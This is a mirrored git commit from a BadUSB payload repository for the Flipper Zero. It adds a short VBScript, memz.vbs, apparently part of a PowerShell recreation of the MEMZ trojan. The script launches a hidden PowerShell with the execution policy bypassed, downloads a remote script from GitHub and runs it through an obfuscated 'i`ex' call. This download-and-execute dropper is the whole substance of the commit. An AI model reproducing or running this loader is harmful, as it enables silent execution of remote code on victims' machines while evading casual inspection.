mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2025-12-24 12:03:52 -08:00
Add files via upload
This commit is contained in:
4
MEMZ-In-Powershell/memz.vbs
Normal file
4
MEMZ-In-Powershell/memz.vbs
Normal file
@@ -0,0 +1,4 @@
|
||||
Set WshShell = WScript.CreateObject("WScript.Shell")
|
||||
WScript.Sleep 200
|
||||
WshShell.Run "powershell.exe -Ep Bypass -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/MEMZ-In-Powershell/main.ps1 | i`ex", 0, True
|
||||
|
||||
Reference in New Issue
Block a user